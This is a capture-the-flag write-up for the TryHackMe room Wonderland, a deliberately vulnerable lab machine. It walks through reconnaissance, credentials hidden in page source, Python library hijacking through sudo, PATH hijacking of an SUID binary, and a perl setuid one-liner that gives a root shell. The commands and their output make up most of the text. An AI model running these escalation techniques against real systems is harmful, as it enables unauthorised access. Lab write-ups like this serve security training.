WriteUp — THM Wonderland

Fall down the rabbit hole and enter wonderland.

This is a writeup for TryHackMe room Wonderland. Let’s see how deep the rabbit hole goes! For my writeup for the next part in the Lewis Carrol themed rooms go here.

NMAP

nmap -sC -sV -p- 10.10.253.192
Starting Nmap 7.80 ( https://nmap.org ) at 2020–10–13 15:34 EEST
Nmap scan report for 10.10.253.192
Host is up (0.053s latency).
Not shown: 65533 closed ports
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   2048 8e:ee:fb:96:ce:ad:70:dd:05:a9:3b:0d:b0:71:b8:63 (RSA)
|   256 7a:92:79:44:16:4f:20:43:50:a9:a8:47:e2:c2:be:84 (ECDSA)
|_  256 00:0b:80:44:e6:3d:4b:69:47:92:2c:55:14:7e:2a:c9 (ED25519)
80/tcp open  http    Golang net/http server (Go-IPFS json-rpc or InfluxDB API)
|_http-title: Follow the white rabbit.
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Web server enumeration

gobuster -q -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -u http://10.10.253.192 dir
/img (Status: 301)
/r (Status: 301)

going to /r tells to

so go to http://10.10.253.192/r/a/b/b/i/t/ where the trail seems to stop. Always worth checking page source and there is something hidden:

<!DOCTYPE html>

<head>
    <title>Enter wonderland</title>
    <link rel="stylesheet" type="text/css" href="/main.css">
</head>

<body>
    <h1>Open the door and enter wonderland</h1>
    <p>"Oh, you’re sure to do that," said the Cat, "if you only walk long enough."</p>
    <p>Alice felt that this could not be denied, so she tried another question. "What sort of people live about here?"
    </p>
    <p>"In that direction,"" the Cat said, waving its right paw round, "lives a Hatter: and in that direction," waving
        the other paw, "lives a March Hare. Visit either you like: they’re both mad."</p>
    <p style="display: none;">alice:__REDACTED__</p>
    <img src="/img/alice_door.png" style="height: 50rem;">
</body>

Another enumeration here might be a good idea. But since that looks like a username and password pair try to login. Bingo! No user flag in sight, but there is a curious python program in alice’s directory. Looking at sudo we see that we can execute it as rabbit.

sudo -l
[sudo] password for alice: 
Matching Defaults entries for alice on wonderland:
 env_reset, mail_badpass,
 secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin
User alice may run the following commands on wonderland:
 (rabbit) /usr/bin/python3.6 /home/alice/walrus_and_the_carpenter.py

ok, this would be too easy if the python file was writable. But the program starts with import random, can we make random.py in the same directory and it gets run? Create the file as follows:

import pty
pty.spawn(“/bin/bash”)

Then sudo into rabbit:

sudo -u rabbit /usr/bin/python3.6 /home/alice/walrus_and_the_carpenter.py
rabbit@wonderland:~$ whoami
rabbit

Enumerate home directory:

cd /home/rabbit
rabbit@wonderland:/home/rabbit$ ls -la
total 40
drwxr-x — — 2 rabbit rabbit 4096 May 25 17:58 .
drwxr-xr-x 6 root root 4096 May 25 17:52 ..
lrwxrwxrwx 1 root root 9 May 25 17:53 .bash_history -> /dev/null
-rw-r — r — 1 rabbit rabbit 220 May 25 03:01 .bash_logout
-rw-r — r — 1 rabbit rabbit 3771 May 25 03:01 .bashrc
-rw-r — r — 1 rabbit rabbit 807 May 25 03:01 .profile
-rwsr-sr-x 1 root root 16816 May 25 17:58 teaParty

There is a suid program here. Let’s try to see what it does.

./teaParty 
Welcome to the tea party!
The Mad Hatter will be here soon.
Probably by Tue, 13 Oct 2020 14:09:03 +0000
Ask very nicely, and I will give you some tea while you wait for him
foo
Segmentation fault (core dumped)

It gets some input but then crashes. ltrace is available:

trace ./teaParty
setuid(1003) = -1
setgid(1003) = -1
puts(“Welcome to the tea party!\nThe Ma”…Welcome to the tea party!
The Mad Hatter will be here soon.
) = 60
system(“/bin/echo -n ‘Probably by ‘ && d”…Probably by Tue, 13 Oct 2020 14:10:23 +0000
 <no return …>
 — — SIGCHLD (Child exited) — -
<… system resumed> ) = 0
puts(“Ask very nicely, and I will give”…Ask very nicely, and I will give you some tea while you wait for him
) = 69
getchar(1, 0x560d35420260, 0x7f979927e8c0, 0x7f9798fa1154foo
) = 102
puts(“Segmentation fault (core dumped)”…Segmentation fault (core dumped)
) = 33
+++ exited (status 33) +++

Pretty funny. Let’s use Cutter to reverse the binary:

void main(void)
{
  setuid(0x3eb);
  setgid(0x3eb);
  puts(“Welcome to the tea party!\nThe Mad Hatter will be here    soon.”);
  system(“/bin/echo -n \’Probably by \’ && date — date=\’next hour\’ -R”);
  puts(“Ask very nicely, and I will give you some tea while you wait   for him”);
  getchar();
  puts(“Segmentation fault (core dumped)”);return;
}

uh oh, date is called with relative path. Same procedure as every time.

echo "/bin/bash" > date
chmod a+x date
PATH=.:$PATH
./teaParty
whoami
hatter

Too bad it doesn’t setuid() to root but we take what we get. Enumerate hatter’s home directory:

cat password.txt 
__REDACTED__

which seems to be hatter’s SSH password so we can skip the previous steps if we need to login again.

Looking for flags… I had to check the hint that says: “ Everything is upside down here.” There is a root flag in user directory so does that mean that root has user flag? ls -la: Permission denied. But:

cat /root/user.txt
thm{“__REDACTED__”}

That took me more than an hour to figure out. Now need to figure out how to privesc to get root.

Run linPEAS. This entry seems interesting:

GTFOBin has the exploit:

perl -e 'use POSIX qw(setuid); POSIX::setuid(0); exec "/bin/sh";'
whoami
root
cat /home/alice/root.txt
thm{__REDACTED__}

So it seems we are at the bottom. Or are we?